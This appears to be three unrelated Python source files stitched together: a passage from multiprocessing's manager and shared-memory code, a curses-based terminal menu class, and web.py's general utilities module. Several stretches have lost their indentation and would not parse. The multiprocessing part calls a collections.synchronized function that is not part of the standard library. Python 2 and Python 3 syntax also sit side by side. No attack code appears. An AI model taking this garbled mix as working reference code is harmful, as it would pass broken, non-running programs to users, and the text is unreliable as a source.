    '__mul__', '__reversed__', '__rmul__', '__setitem__',
    'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
    'reverse', 'sort', '__imul__'
    ))
class ListProxy(BaseListProxy):
    # In-place operators must return self (the proxy): otherwise `lst += x`
    # would rebind the caller's name to the remote method's return value.
    def __iadd__(self, value):
        self._callmethod('extend', (value,))
        return self
    def __imul__(self, value):
        self._callmethod('__imul__', (value,))
        return self
# Generated proxy exposing the standard dict methods.
DictProxy = MakeProxyType('DictProxy', (
    '__contains__', '__delitem__', '__getitem__', '__iter__', '__len__',
    '__setitem__', 'clear', 'copy', 'get', 'items',
    'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
    ))
# Iterating a DictProxy yields a proxied iterator, not a copied sequence.
DictProxy._method_to_typeid_ = {
    '__iter__': 'Iterator',
    }
# Generated proxy for array.array referents (indexing and length only).
ArrayProxy = MakeProxyType('ArrayProxy', (
    '__len__', '__getitem__', '__setitem__'
    ))
# Generated proxy for pool.Pool referents.
BasePoolProxy = MakeProxyType('PoolProxy', (
    'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
    'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
    ))
# Methods returning async results or iterators hand back proxies rather
# than copies (see the 'Iterator'/'AsyncResult' registrations below).
BasePoolProxy._method_to_typeid_ = {
    'apply_async': 'AsyncResult',
    'map_async': 'AsyncResult',
    'starmap_async': 'AsyncResult',
    'imap': 'Iterator',
    'imap_unordered': 'Iterator'
    }
class PoolProxy(BasePoolProxy):
    # Context-manager support: leaving the block terminates the pool,
    # mirroring pool.Pool's own __exit__ behaviour.
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
    '''
    Subclass of `BaseManager` which supports a number of shared object types.

    The types registered are those intended for the synchronization
    of threads, plus `dict`, `list` and `Namespace`.

    The `multiprocessing.Manager()` function creates started instances of
    this class.
    '''
def synchronized_list(*args):
    # Factory for the manager's 'list' typeid.
    # NOTE(review): `collections.synchronized` is not part of the standard
    # library `collections` module -- presumably a project-local helper that
    # wraps the list with locking; verify the `collections` import at the
    # top of this file before relying on it.
    return collections.synchronized(list(*args))
# Standard registrations for SyncManager.  Where no proxy type is given,
# AutoProxy generates one from the referent's public methods at runtime.
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
                     AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', synchronized_list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)

# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
#
# Definition of SharedMemoryManager and SharedMemoryServer
#
if HAS_SHMEM:
class _SharedMemoryTracker:
"Manages one or more shared memory segments."
def __init__(self, name, segment_names=[]):
self.shared_memory_context_name = name
self.segment_names = segment_names
def register_segment(self, segment_name):
"Adds the supplied shared memory block name to tracker."
util.debug(f"Register segment {segment_name!r} in pid {getpid()}")
self.segment_names.append(segment_name)
def destroy_segment(self, segment_name):
"""Calls unlink() on the shared memory block with the supplied name
and removes it from the list of blocks being tracked."""
util.debug(f"Destroy segment {segment_name!r} in pid {getpid()}")
self.segment_names.remove(segment_name)
segment = shared_memory.SharedMemory(segment_name)
segment.close()
segment.unlink()
def unlink(self):
"Calls destroy_segment() on all tracked shared memory blocks."
for segment_name in self.segment_names[:]:
self.destroy_segment(segment_name)
def __del__(self):
util.debug(f"Call {self.__class__.__name__}.__del__ in {getpid()}")
self.unlink()
def __getstate__(self):
return (self.shared_memory_context_name, self.segment_names)
def __setstate__(self, state):
self.__init__(*state)
class SharedMemoryServer(Server):

    # Extra endpoints callable by clients, beyond the base Server set.
    public = Server.public + \
             ['track_segment', 'release_segment', 'list_segments']

    def __init__(self, *args, **kwargs):
        Server.__init__(self, *args, **kwargs)
        # One tracker per server records every shared memory segment
        # created on behalf of clients, so shutdown can unlink them all.
        self.shared_memory_context = \
            _SharedMemoryTracker(f"shmm_{self.address}_{getpid()}")
        util.debug(f"SharedMemoryServer started by pid {getpid()}")

    def create(self, c, typeid, /, *args, **kwargs):
        """Create a new distributed-shared object (not backed by a shared
        memory block) and return its id to be used in a Proxy Object."""
        # Unless set up as a shared proxy, don't make shared_memory_context
        # a standard part of kwargs.  This makes things easier for supplying
        # simple functions.
        if hasattr(self.registry[typeid][-1], "_shared_memory_proxy"):
            kwargs['shared_memory_context'] = self.shared_memory_context
        return Server.create(self, c, typeid, *args, **kwargs)

    def shutdown(self, c):
        "Call unlink() on all tracked shared memory, terminate the Server."
        self.shared_memory_context.unlink()
        return Server.shutdown(self, c)

    def track_segment(self, c, segment_name):
        "Adds the supplied shared memory block name to Server's tracker."
        self.shared_memory_context.register_segment(segment_name)

    def release_segment(self, c, segment_name):
        """Calls unlink() on the shared memory block with the supplied name
        and removes it from the tracker instance inside the Server."""
        self.shared_memory_context.destroy_segment(segment_name)

    def list_segments(self, c):
        """Returns a list of names of shared memory blocks that the Server
        is currently tracking."""
        return self.shared_memory_context.segment_names
class SharedMemoryManager(BaseManager):
    """Like SyncManager but uses SharedMemoryServer instead of Server.

    It provides methods for creating and returning SharedMemory instances
    and for creating a list-like object (ShareableList) backed by shared
    memory.  It also provides methods that create and return Proxy Objects
    that support synchronization across processes (i.e. multi-process-safe
    locks and semaphores).
    """

    _Server = SharedMemoryServer

    def __init__(self, *args, **kwargs):
        if os.name == "posix":
            # bpo-36867: Ensure the resource_tracker is running before
            # launching the manager process, so that concurrent
            # shared_memory manipulation both in the manager and in the
            # current process does not create two resource_tracker
            # processes.
            from . import resource_tracker
            resource_tracker.ensure_running()
        BaseManager.__init__(self, *args, **kwargs)
        util.debug(f"{self.__class__.__name__} created by pid {getpid()}")

    def __del__(self):
        util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
        pass

    def get_server(self):
        'Better than monkeypatching for now; merge into Server ultimately'
        if self._state.value != State.INITIAL:
            if self._state.value == State.STARTED:
                raise ProcessError("Already started SharedMemoryServer")
            elif self._state.value == State.SHUTDOWN:
                raise ProcessError("SharedMemoryManager has shut down")
            else:
                raise ProcessError(
                    "Unknown state {!r}".format(self._state.value))
        return self._Server(self._registry, self._address,
                            self._authkey, self._serializer)

    def SharedMemory(self, size):
        """Returns a new SharedMemory instance with the specified size in
        bytes, to be tracked by the manager."""
        with self._Client(self._address, authkey=self._authkey) as conn:
            sms = shared_memory.SharedMemory(None, create=True, size=size)
            try:
                dispatch(conn, None, 'track_segment', (sms.name,))
            except BaseException as e:
                # Roll back: if the server cannot track it, do not leak the
                # freshly created segment.
                sms.unlink()
                raise e
        return sms

    def ShareableList(self, sequence):
        """Returns a new ShareableList instance populated with the values
        from the input sequence, to be tracked by the manager."""
        with self._Client(self._address, authkey=self._authkey) as conn:
            sl = shared_memory.ShareableList(sequence)
            try:
                dispatch(conn, None, 'track_segment', (sl.shm.name,))
            except BaseException as e:
                # Roll back the segment if the server cannot track it.
                sl.shm.unlink()
                raise e
        return sl
|
curses_menu.py | import curses
import os
import platform
import threading
class CursesMenu(object):
"""
A class that displays a menu and allows the user to select an option
:cvar CursesMenu cls.currently_active_menu: Class variable that holds the currently active menu or None if no menu\
is currently active (E.G. when switching between menus)
"""
currently_active_menu = None # define local class variable
stdscr = None # define local class variable
def __init__(self, title=None, subtitle=None, show_exit_option=True):
    """
    :ivar str title: The title of the menu
    :ivar str subtitle: The subtitle of the menu
    :ivar bool show_exit_option: Whether this menu should show an exit item by default. Can be overridden \
    when the menu is started
    :ivar items: The list of MenuItems that the menu will display
    :vartype items: list[:class:`MenuItem<cursesmenu.items.MenuItem>`]
    :ivar CursesMenu parent: The parent of this menu
    :ivar CursesMenu previous_active_menu: the previously active menu to be restored into the class's \
    currently active menu
    :ivar int current_option: The currently highlighted menu option
    :ivar MenuItem current_item: The item corresponding to the menu option that is currently highlighted
    :ivar int selected_option: The option that the user has most recently selected
    :ivar MenuItem selected_item: The item in :attr:`items` that the user most recently selected
    :ivar returned_value: The value returned by the most recently selected item
    :ivar screen: the curses window associated with this menu
    :ivar normal: the normal text color pair for this menu
    :ivar highlight: the highlight color pair associated with this window
    """
    # NOTE: these are instance attributes (the original comments wrongly
    # called them class variables).  Curses-related ones stay None until
    # the menu is started.
    self.screen = None                       # curses window, created on start
    self.highlight = None                    # highlight color pair, set on start
    self.normal = None                       # normal color pair, set on start
    self.title = title
    self.subtitle = subtitle
    self.show_exit_option = show_exit_option
    self.items = list()                      # menu items, in display order
    self.parent = None                       # parent menu, if this is a submenu
    self.exit_item = ExitItem(menu=self)     # shared exit entry appended last
    self.current_option = 0                  # index of the highlighted item
    self.selected_option = -1                # -1 means nothing selected yet
    self.returned_value = None
    self.should_exit = False
    self.previous_active_menu = None
    self._main_thread = None                 # thread running the main loop
    self._running = threading.Event()        # set while the menu loop runs
def __repr__(self):
    """Summary in the form '<title>: <subtitle>. N items'."""
    summary = "%s: %s. %d items"
    return summary % (self.title, self.subtitle, len(self.items))
@property
def current_item(self):
    """
    The item currently highlighted, or None when the menu has no items.

    :rtype: MenuItem|None
    """
    if not self.items:
        return None
    return self.items[self.current_option]
@property
def selected_item(self):
    """
    The item the user most recently selected, or None when nothing has
    been selected yet (selected_option == -1) or the menu is empty.

    :rtype: MenuItem|None
    """
    if self.items and self.selected_option != -1:
        # Fix: previously indexed with current_option, which returned the
        # *highlighted* item instead of the most recently selected one.
        return self.items[self.selected_option]
    else:
        return None
def append_item(self, item):
    """
    Add an item to the end of the menu before the exit item

    :param MenuItem item: The item to be added
    """
    did_remove = self.remove_exit()     # temporarily drop the exit entry
    item.menu = self                    # give the item a back-reference to its menu
    self.items.append(item)
    if did_remove:
        self.add_exit()                 # restore the exit entry at the end
    if self.screen:
        # Menu already on screen: grow the window if the item list no
        # longer fits (6 rows of chrome + one row per item), then redraw.
        max_row, max_cols = self.screen.getmaxyx()
        if max_row < 6 + len(self.items):
            self.screen.resize(6 + len(self.items), max_cols)
        self.draw()
def add_exit(self):
"""
Add the exit item if necessary. Used to make sure there aren't multiple exit items
:return: True if item needed to be added, False otherwise
:rtype: bool
"""
if self.items: # if items exists
if self.items[-1] is not self.exit_item: # if last item is not exit
self.items.append(self.exit_item) # append exit
return True # return True -
return False
def remove_exit(self):
"""
Remove the exit item if necessary. Used to make sure we only remove the exit item, not something else
:return: True if item needed to be removed, False otherwise
:rtype: bool
"""
if self.items: # if items exists
if self.items[-1] is self.exit_item: # if last item in menu is exit
del self.items[-1] # delete exit from items
return True # return True
return False
    def _wrap_start(self):
        # Thread target: run the menu loop, then restore global menu state.
        if self.parent is None:
            # Top-level menu: let curses.wrapper handle terminal init/teardown.
            curses.wrapper(self._main_loop)
        else:
            # Submenu: the terminal is already initialised by the parent.
            self._main_loop(None)
        CursesMenu.currently_active_menu = None
        self.clear_screen()  # wipe this menu's pad
        clear_terminal()  # reset the real terminal
        CursesMenu.currently_active_menu = self.previous_active_menu
    def start(self, show_exit_option=None):
        """
        Start the menu in a new thread and allow the user to interact with it.
        The thread is a daemon, so :meth:`join()<cursesmenu.CursesMenu.join>` should be called if there's a possibility\
        that the main thread will exit before the menu is done
        :param bool show_exit_option: Whether the exit item should be shown, defaults to\
        the value set in the constructor
        """
        self.previous_active_menu = CursesMenu.currently_active_menu  # remembered so _wrap_start can restore it
        CursesMenu.currently_active_menu = None
        self.should_exit = False
        if show_exit_option is None:
            show_exit_option = self.show_exit_option  # fall back to constructor setting
        if show_exit_option:
            self.add_exit()
        else:
            self.remove_exit()
        try:
            # Python 3.3+ accepts daemon= in the Thread constructor.
            self._main_thread = threading.Thread(target=self._wrap_start, daemon=True)
        except TypeError:
            # Older Pythons: set the daemon flag after construction.
            self._main_thread = threading.Thread(target=self._wrap_start)
            self._main_thread.daemon = True
        self._main_thread.start()
def show(self, show_exit_option=None):
"""
Calls start and then immediately joins.
:param bool show_exit_option: Whether the exit item should be shown, defaults to the value set \
in the constructor
"""
self.start(show_exit_option) # start thread
self.join() # join
    def _main_loop(self, scr):
        # Core loop run on the menu thread; scr is None for submenus
        # (the parent's curses.wrapper already supplied the screen).
        if scr is not None:
            CursesMenu.stdscr = scr  # shared by all menus (class attribute)
        # Pad tall enough for the 6-row title block plus one row per item.
        self.screen = curses.newpad(len(self.items) + 6, CursesMenu.stdscr.getmaxyx()[1])
        self._set_up_colors()
        curses.curs_set(0)  # hide the hardware cursor
        CursesMenu.stdscr.refresh()
        self.draw()
        CursesMenu.currently_active_menu = self
        self._running.set()  # unblocks wait_for_start() callers
        while self._running.wait() is not False and not self.should_exit:
            # wait() blocks while paused; process one keypress per iteration.
            self.process_user_input()
    def draw(self):
        """
        Redraws the menu and refreshes the screen. Should be called whenever something changes that needs to be redrawn.
        """
        self.screen.border(0)
        if self.title is not None:
            self.screen.addstr(2, 2, self.title, curses.A_STANDOUT)
        if self.subtitle is not None:
            self.screen.addstr(4, 2, self.subtitle, curses.A_BOLD)
        for index, item in enumerate(self.items):
            # Highlight only the row under the cursor.
            if self.current_option == index:
                text_style = self.highlight
            else:
                text_style = self.normal
            self.screen.addstr(5 + index, 4, item.show(index), text_style)  # rows 0-4 hold border/title/subtitle
        screen_rows, screen_cols = CursesMenu.stdscr.getmaxyx()
        top_row = 0
        if 6 + len(self.items) > screen_rows:
            # Menu taller than the terminal: scroll the pad so the
            # highlighted option stays visible.
            if screen_rows + self.current_option < 6 + len(self.items):
                top_row = self.current_option
            else:
                # Near the bottom: pin the view to the last full page.
                top_row = 6 + len(self.items) - screen_rows
        self.screen.refresh(top_row, 0, 0, 0, screen_rows - 1, screen_cols - 1)
    def is_running(self):
        """
        :return: True if the menu is started and hasn't been paused
        """
        return self._running.is_set()  # Event is cleared by pause(), set by resume()/_main_loop()
    def wait_for_start(self, timeout=None):
        """
        Block until the menu is started
        :param timeout: How long to wait before timing out
        :return: False if timeout is given and operation times out, True otherwise. None before Python 2.7
        """
        return self._running.wait(timeout)  # delegates to threading.Event.wait
    def is_alive(self):
        """
        :return: True if the thread is still alive, False otherwise
        """
        return self._main_thread.is_alive()  # the thread created by start()
    def pause(self):
        """
        Temporarily pause the menu until resume is called
        """
        self._running.clear()  # _main_loop blocks on _running.wait() until resume()
    def resume(self):
        """
        Sets the currently active menu to this one and resumes it
        """
        CursesMenu.currently_active_menu = self
        self._running.set()  # wakes the _main_loop wait()
    def join(self, timeout=None):
        """
        Should be called at some point after :meth:`start()<cursesmenu.CursesMenu.start>` to block until the menu exits.
        :param Number timeout: How long to wait before timing out
        """
        self._main_thread.join(timeout=timeout)
    def get_input(self):
        """
        Can be overridden to change the input method.
        Called in :meth:`process_user_input()<cursesmenu.CursesMenu.process_user_input>`
        :return: the ordinal value of a single character
        :rtype: int
        """
        return CursesMenu.stdscr.getch()  # blocking read of one key
def process_user_input(self):
"""
Gets the next single character and decides what to do with it
"""
user_input = self.get_input() # define user input as get input
go_to_max = ord("9") if len(self.items) >= 9 else ord(str(len(self.items))) # max value is 9 items ???
if ord('1') <= user_input <= go_to_max: # if user enters number go there in menu
self.go_to(user_input - ord('0') - 1) # go there
elif user_input == curses.KEY_DOWN: # if user gives KEY DOWN go down by 1
self.go_down()
elif user_input == curses.KEY_UP: # if user gives KEY UP go up by 1
self.go_up()
elif user_input == ord("\n"): # if user gives ENTER select and execute
self.select()
return user_input # return user input
def go_to(self, option):
"""
Go to the option entered by the user as a number
:param option: the option to go to
:type option: int
"""
self.current_option = option
self.draw()
def go_down(self):
"""
Go down one, wrap to beginning if necessary
"""
if self.current_option < len(self.items) - 1:
self.current_option += 1
else:
self.current_option = 0
self.draw()
def go_up(self):
"""
Go up one, wrap to end if necessary
"""
if self.current_option > 0:
self.current_option += -1
else:
self.current_option = len(self.items) - 1
self.draw()
    def select(self):
        """
        Select the current item and run it
        """
        self.selected_option = self.current_option
        # Item lifecycle: set_up -> action -> clean_up, then collect results.
        # selected_item is re-read each step on purpose (it is a property).
        self.selected_item.set_up()
        self.selected_item.action()
        self.selected_item.clean_up()
        self.returned_value = self.selected_item.get_return()
        self.should_exit = self.selected_item.should_exit  # True for ExitItem
        if not self.should_exit:
            self.draw()
    def exit(self):
        """
        Signal the menu to exit, then block until it's done cleaning up
        """
        self.should_exit = True  # checked by the loop in _main_loop after the next keypress
        self.join()
    def _set_up_colors(self):
        # Pair 1 (black on white) renders the highlighted row in draw().
        curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
        self.highlight = curses.color_pair(1)
        self.normal = curses.A_NORMAL
    def clear_screen(self):
        """
        Clear the screen belonging to this menu
        """
        self.screen.clear()  # clears only this menu's pad, not the terminal
class MenuItem(object):
    """
    A generic menu item
    """

    def __init__(self, text, menu=None, should_exit=False):
        """
        :ivar str text: The text shown for this menu item
        :ivar CursesMenu menu: The menu to which this item belongs
        :ivar bool should_exit: Whether the menu should exit once this item's action is done
        """
        self.text = text
        self.menu = menu
        self.should_exit = should_exit

    def __str__(self):
        return "{0} {1}".format(self.menu.title, self.text)

    def show(self, index):
        """
        Build the single-line menu representation of this item, e.g.::

            1 - Item 1
            2 - Another Item

        Can be overridden, but should keep the same signature.

        :param int index: zero-based position of the item in the menu's list
        :return: the text rendered for the menu row
        :rtype: str
        """
        return "{0} - {1}".format(index + 1, self.text)

    def set_up(self):
        """Hook run before :meth:`action`; no-op by default."""
        pass

    def action(self):
        """Hook holding the item's main behaviour; no-op by default."""
        pass

    def clean_up(self):
        """Hook run after :meth:`action`; no-op by default."""
        pass

    def get_return(self):
        """
        Override to change what the item returns.
        By default, report the owning menu's most recent returned value.
        """
        return self.menu.returned_value
class ExitItem(MenuItem):
    """
    Used to exit the current menu. Handled by :class:`cursesmenu.CursesMenu`
    """

    def __init__(self, text="Exit", menu=None):
        super(ExitItem, self).__init__(text=text, menu=menu, should_exit=True)

    def show(self, index):
        """
        Relabel the entry each time it is drawn: a submenu shows
        "Return to <parent> menu", a top-level menu shows "Exit".
        """
        has_parent = self.menu and self.menu.parent
        self.text = "Return to %s menu" % self.menu.parent.title if has_parent else "Exit"
        return super(ExitItem, self).show(index)
def clear_terminal():
    """
    Clear the real terminal via the platform's shell command:
    ``cls`` on Windows, ``reset`` everywhere else.
    """
    command = 'cls' if platform.system().lower() == "windows" else 'reset'
    os.system(command)
|
utils.py | #!/usr/bin/env python
"""
General Utilities
(part of web.py)
"""
__all__ = [
"Storage", "storage", "storify",
"iters",
"rstrips", "lstrips", "strips",
"safeunicode", "safestr", "utf8",
"TimeoutError", "timelimit",
"Memoize", "memoize",
"re_compile", "re_subm",
"group",
"IterBetter", "iterbetter",
"dictreverse", "dictfind", "dictfindall", "dictincr", "dictadd",
"listget", "intget", "datestr",
"numify", "denumify", "commify", "dateify",
"nthstr",
"CaptureStdout", "capturestdout", "Profile", "profile",
"tryall",
"ThreadedDict", "threadeddict",
"autoassign",
"to36",
"safemarkdown",
"sendmail"
]
import re, sys, time, threading, itertools
import os
try:
    import subprocess
except ImportError:
    subprocess = None
try: import datetime
except ImportError: pass
class Storage(dict):
    """
    A Storage object is like a dictionary except `obj.foo` can be used
    in addition to `obj['foo']`.
    >>> o = storage(a=1)
    >>> o.a
    1
    >>> o['a']
    1
    >>> o.a = 2
    >>> o['a']
    2
    >>> del o.a
    >>> o.a
    Traceback (most recent call last):
        ...
    AttributeError: 'a'
    """
    def __getattr__(self, key):
        # Attribute reads fall through to item access; a missing key is
        # reported as AttributeError so hasattr() behaves as expected.
        try:
            return self[key]
        except KeyError, k:
            raise AttributeError, k
    def __setattr__(self, key, value):
        # Attribute writes go straight into the underlying dict.
        self[key] = value
    def __delattr__(self, key):
        try:
            del self[key]
        except KeyError, k:
            raise AttributeError, k
    def __repr__(self):
        return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage  # conventional lowercase alias used throughout web.py
def storify(mapping, *requireds, **defaults):
    """
    Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
    d doesn't have all of the keys in `requireds` and using the default
    values for keys found in `defaults`.
    For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
    `storage({'a':1, 'b':2, 'c':3})`.
    If a `storify` value is a list (e.g. multiple values in a form submission),
    `storify` returns the last element of the list, unless the key appears in
    `defaults` as a list. Thus:
    >>> storify({'a':[1, 2]}).a
    2
    >>> storify({'a':[1, 2]}, a=[]).a
    [1, 2]
    >>> storify({'a':1}, a=[]).a
    [1]
    >>> storify({}, a=[]).a
    []
    Similarly, if the value has a `value` attribute, `storify will return _its_
    value, unless the key appears in `defaults` as a dictionary.
    >>> storify({'a':storage(value=1)}).a
    1
    >>> storify({'a':storage(value=1)}, a={}).a
    <Storage {'value': 1}>
    >>> storify({}, a={}).a
    {}
    Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
    >>> storify({'x': 'a'}, _unicode=True)
    <Storage {'x': u'a'}>
    >>> storify({'x': storage(value='a')}, x={}, _unicode=True)
    <Storage {'x': <Storage {'value': 'a'}>}>
    >>> storify({'x': storage(value='a')}, _unicode=True)
    <Storage {'x': u'a'}>
    """
    # _unicode is a keyword-only switch smuggled through **defaults.
    _unicode = defaults.pop('_unicode', False)
    def unicodify(s):
        if _unicode and isinstance(s, str): return safeunicode(s)
        else: return s
    def getvalue(x):
        # cgi.FieldStorage-style objects carry their payload in .value.
        if hasattr(x, 'value'):
            return unicodify(x.value)
        else:
            return unicodify(x)
    stor = Storage()
    for key in requireds + tuple(mapping.keys()):
        # A required key missing from `mapping` raises KeyError here.
        value = mapping[key]
        if isinstance(value, list):
            if isinstance(defaults.get(key), list):
                value = [getvalue(x) for x in value]
            else:
                # Multiple submissions of one field: keep only the last.
                value = value[-1]
        if not isinstance(defaults.get(key), dict):
            value = getvalue(value)
        if isinstance(defaults.get(key), list) and not isinstance(value, list):
            value = [value]
        setattr(stor, key, value)
    for (key, value) in defaults.iteritems():
        result = value
        if hasattr(stor, key):
            result = stor[key]
        if value == () and not isinstance(result, tuple):
            # A () default means "always a tuple": wrap scalar results.
            result = (result,)
        setattr(stor, key, result)
    return stor
# `iters` collects the iterable container types available in this Python,
# so callers can test `isinstance(x, iters)`.
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
    iters.append(set)
if hasattr(__builtin__, 'frozenset'):
    # BUG FIX: previously appended `set` a second time instead of `frozenset`.
    iters.append(frozenset)
if sys.version_info < (2,6): # sets module deprecated in 2.6
    try:
        from sets import Set
        iters.append(Set)
    except ImportError:
        pass
# tuple subclass so a docstring can be attached to the instance below.
class _hack(tuple): pass
iters = _hack(iters)
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
    """
    Remove the suffix `remove` from the right of `text` if present.
    >>> rstrips("foobar", "bar")
    'foo'
    """
    return _strips('r', text, remove)
def lstrips(text, remove):
    """
    Remove the prefix `remove` from the left of `text` if present.
    >>> lstrips("foobar", "foo")
    'bar'
    """
    return _strips('l', text, remove)
def strips(text, remove):
    """
    Remove `remove` from both sides of `text` if present.
    >>> strips("foobarfoo", "foo")
    'bar'
    """
    # Strip the prefix first, then the suffix.
    return rstrips(lstrips(text, remove), remove)
def safeunicode(obj, encoding='utf-8'):
    r"""
    Converts any given object to unicode string.
    >>> safeunicode('hello')
    u'hello'
    >>> safeunicode(2)
    u'2'
    >>> safeunicode('\xe1\x88\xb4')
    u'\u1234'
    """
    if isinstance(obj, unicode):
        return obj
    elif isinstance(obj, str):
        # Byte strings are decoded with the given encoding (UTF-8 by default).
        return obj.decode(encoding)
    else:
        if hasattr(obj, '__unicode__'):
            return unicode(obj)
        else:
            # Fall back to str() then decode, for arbitrary objects.
            return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
    r"""
    Converts any given object to utf-8 encoded string.
    >>> safestr('hello')
    'hello'
    >>> safestr(u'\u1234')
    '\xe1\x88\xb4'
    >>> safestr(2)
    '2'
    """
    if isinstance(obj, unicode):
        # NOTE: always encodes as UTF-8; the `encoding` parameter is unused here.
        return obj.encode('utf-8')
    elif isinstance(obj, str):
        return obj
    elif hasattr(obj, 'next'): # iterator
        # Lazily convert each element instead of consuming the iterator.
        return itertools.imap(safestr, obj)
    else:
        return str(obj)
# for backward-compatibility
utf8 = safestr
# Raised by timelimit() below. NOTE: shadows the Python 3 builtin of the same name.
class TimeoutError(Exception): pass
def timelimit(timeout):
    """
    A decorator to limit a function to `timeout` seconds, raising `TimeoutError`
    if it takes longer.
    >>> import time
    >>> def meaningoflife():
    ...     time.sleep(.2)
    ...     return 42
    >>>
    >>> timelimit(.1)(meaningoflife)()
    Traceback (most recent call last):
        ...
    TimeoutError: took too long
    >>> timelimit(1)(meaningoflife)()
    42
    _Caveat:_ The function isn't stopped after `timeout` seconds but continues
    executing in a separate thread. (There seems to be no way to kill a thread.)
    inspired by <http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878>
    """
    def _1(function):
        def _2(*args, **kw):
            # The wrapped call runs on a daemon thread so it can't block exit.
            class Dispatch(threading.Thread):
                def __init__(self):
                    threading.Thread.__init__(self)
                    self.result = None
                    self.error = None
                    self.setDaemon(True)
                    self.start()
                def run(self):
                    try:
                        self.result = function(*args, **kw)
                    except:
                        # Stash the full exc_info so it can be re-raised
                        # on the calling thread below.
                        self.error = sys.exc_info()
            c = Dispatch()
            c.join(timeout)
            if c.isAlive():
                # Still running after the deadline: the thread keeps going,
                # but the caller gets a TimeoutError.
                raise TimeoutError, 'took too long'
            if c.error:
                raise c.error[0], c.error[1]
            return c.result
        return _2
    return _1
class Memoize:
    """
    'Memoizes' a function, caching its return values for each input.
    >>> import time
    >>> def meaningoflife():
    ...     time.sleep(.2)
    ...     return 42
    >>> fastlife = memoize(meaningoflife)
    >>> meaningoflife()
    42
    >>> timelimit(.1)(meaningoflife)()
    Traceback (most recent call last):
        ...
    TimeoutError: took too long
    >>> fastlife()
    42
    >>> timelimit(.1)(fastlife)()
    42
    """
    def __init__(self, func):
        self.func = func    # the wrapped callable
        self.cache = {}     # (args, sorted kwargs) -> cached result
    def __call__(self, *args, **keywords):
        # BUG FIX: sort the keyword items so f(a=1, b=2) and f(b=2, a=1)
        # share one cache entry regardless of dict iteration order.
        key = (args, tuple(sorted(keywords.items())))
        if key not in self.cache:
            self.cache[key] = self.func(*args, **keywords)
        return self.cache[key]
memoize = Memoize
# Memoized re.compile: repeated calls with the same pattern reuse the compiled object.
re_compile = memoize(re.compile) #@@ threadsafe? Memoize has no lock -- confirm single-threaded use.
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
    """Replacement callable for re.sub that records the match it receives."""
    def __init__(self):
        self.match = None
    def __call__(self, match):
        # Remember the match object; the replacement text is irrelevant.
        self.match = match
        return ''
def re_subm(pat, repl, string):
    """
    Like re.sub, but returns the replacement _and_ the match object.
    >>> t, m = re_subm('g(oo+)fball', r'f\\1lish', 'goooooofball')
    >>> t
    'foooooolish'
    >>> m.groups()
    ('oooooo',)
    """
    compiled = re_compile(pat)
    # First pass only captures the match object; the second pass performs
    # the actual substitution.
    proxy = _re_subm_proxy()
    compiled.sub(proxy.__call__, string)
    return compiled.sub(repl, string), proxy.match
def group(seq, size):
    """
    Returns an iterator over a series of lists of length size from iterable.
    >>> list(group([1,2,3,4], 2))
    [[1, 2], [3, 4]]
    """
    if not hasattr(seq, 'next'):
        seq = iter(seq)
    while True:
        # NOTE(review): when len(seq) is not a multiple of `size`, the
        # StopIteration raised inside the list comp ends the generator and
        # silently drops the partial trailing group -- confirm intended.
        yield [seq.next() for i in xrange(size)]
class IterBetter:
    """
    Returns an object that can be used as an iterator
    but can also be used via __getitem__ (although it
    cannot go backwards -- that is, you cannot request
    `iterbetter[0]` after requesting `iterbetter[1]`).
    >>> import itertools
    >>> c = iterbetter(itertools.count())
    >>> c[1]
    1
    >>> c[5]
    5
    >>> c[3]
    Traceback (most recent call last):
        ...
    IndexError: already passed 3
    """
    def __init__(self, iterator):
        # i: the wrapped iterator; c: how many elements have been consumed.
        self.i, self.c = iterator, 0
    def __iter__(self):
        while 1:
            yield self.i.next()
            self.c += 1
    def __getitem__(self, i):
        #todo: slices
        if i < self.c:
            # The underlying iterator cannot rewind.
            raise IndexError, "already passed "+str(i)
        try:
            # Skip forward until position i is next.
            while i > self.c:
                self.i.next()
                self.c += 1
            # now self.c == i
            self.c += 1
            return self.i.next()
        except StopIteration:
            # Iterator exhausted before reaching i.
            raise IndexError, str(i)
iterbetter = IterBetter
def dictreverse(mapping):
    """
    Returns a new dictionary with keys and values swapped.
    >>> dictreverse({1: 2, 3: 4})
    {2: 1, 4: 3}
    """
    # .items() works on both Python 2 and 3 (iteritems() is 2.x-only).
    return dict((value, key) for (key, value) in mapping.items())
def dictfind(dictionary, element):
    """
    Returns a key whose value in `dictionary` is `element`
    or, if none exists, None.
    >>> d = {1:2, 3:4}
    >>> dictfind(d, 4)
